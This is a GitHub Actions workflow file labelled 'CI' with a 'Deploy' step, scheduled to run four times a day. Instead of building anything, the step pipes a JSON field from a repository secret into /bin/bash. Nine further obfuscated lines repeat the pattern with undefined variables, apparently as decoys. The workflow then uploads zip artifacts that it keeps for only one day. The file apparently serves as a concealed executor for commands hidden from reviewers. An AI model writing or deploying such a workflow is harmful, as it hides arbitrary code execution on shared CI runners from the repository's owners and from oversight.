name: CI
on:
  workflow_dispatch:

  schedule:
    - cron: '19 0,6,12,18 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  dispatcher:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Deploy
        env:
          tns255: ${{ secrets.tns255 }}
        run: |
          printf '%s' "$tns255" | jq -r .ev08601 | /bin/bash
          echo $vm8 | jq -r .ny8 | /bin/bash
          echo $lfa7 | jq -r .j2779 | /bin/bash
          printf '%s' "$tygsf974" | jq -r .fc9496 | /bin/bash
          echo $y7 | jq -r .lti4319 | /bin/bash
          echo $xh9 | jq -r .n53365 | /bin/bash
          printf '%s' "$nxw61932" | jq -r .kozs35 | /bin/bash
          echo $ixq396 | jq -r .d43582 | /bin/bash
          echo $kw3584 | jq -r .pd67 | /bin/bash
          echo $b21763 | jq -r .ygv387 | /bin/bash

      - name: Save results
        uses: actions/upload-artifact@v4
        with:
          name: K8J4xBHO
          path: "*.zip"
          retention-days: 1
